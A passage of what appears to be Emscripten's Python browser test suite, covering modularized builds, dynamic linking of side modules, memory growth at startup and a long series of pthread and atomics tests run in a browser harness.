create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', src)
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize INITIAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._run_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._run_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._run_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._run_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _run_dylink_dso_needed(self, wasm, inworker):
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME=1'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD=1'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS=1'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
